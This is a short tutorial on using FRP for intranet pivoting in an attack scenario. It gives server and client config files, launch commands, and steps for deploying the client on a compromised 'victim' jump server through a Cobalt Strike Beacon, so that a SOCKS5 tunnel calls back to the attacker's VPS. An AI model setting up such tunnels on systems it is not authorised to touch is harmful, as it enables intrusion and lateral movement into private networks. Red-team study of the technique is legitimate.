FRP is a high-performance reverse proxy application that focuses on intranet penetration. It supports multiple protocols such as TCP, UDP, HTTP, HTTPS, and supports P2P communication. It can expose intranet services to the public network in a secure and convenient manner through nodes with public IP addresses.
FRP project address: https://github.com/fatedier/frp/blob/dev/README_zh.md
Assuming the current network topology is as follows, 172.16.1.2 cannot directly access 10.1.1.2 and needs to be accessed through frp proxy.
frp VPS proxy#
172.16.1.2 - <172.16.1.4,10.1.1.3 > 10.1.1.2
Attacker (172.16.1.2):
Configure frps.ini file
The configuration file is as follows:
frps.ini
[common]
bind_port = 7000
bind_addr = 0.0.0.0
Victim (jump server: 172.16.1.4) is configured as follows:
Configure frpc.ini with the following content:
frpc.ini
[common]
server_addr = vpsip
server_port = 7000
[http_proxy]
type = tcp
remote_port = 1080
plugin = socks5
After the settings are completed, start listening on the attacker's server first
./frps -c frps.ini
Execute on the victim's side
frpc.exe -c frpc.ini
Set the browser to access through the proxy
Configure proxychains for remote login through proxy
CS configure frp#
Assuming the topology is as follows, it is actually the same as the previous operation.
172.16.1.3 - <172.16.1.4,10.1.1.4 > 10.1.1.3
When running frpc with CS's Beacon, both the configuration file and the program use absolute paths. Use file upload to proxy frpc.exe and frpc.ini files.
The configuration files are as follows:
frps.ini
[common]
bind_port = 7000
frpc.ini
[common]
server_addr = 172.16.1.3
server_port = 7000
[http_proxy]
type = tcp
remote_port = 1080
plugin = socks5
Proxy successful.
